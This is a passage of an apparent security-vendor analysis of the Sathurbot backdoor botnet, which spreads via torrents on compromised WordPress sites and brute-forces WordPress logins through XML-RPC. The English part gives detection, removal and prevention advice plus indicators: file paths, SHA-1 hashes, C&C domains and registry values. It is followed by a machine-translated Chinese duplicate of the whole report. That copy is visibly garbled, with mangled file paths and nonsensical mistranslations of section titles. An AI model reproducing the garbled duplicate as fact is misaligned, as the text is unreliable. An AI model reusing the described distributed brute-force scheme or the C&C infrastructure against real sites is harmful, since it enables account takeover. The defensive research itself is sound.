The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C &#38; C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息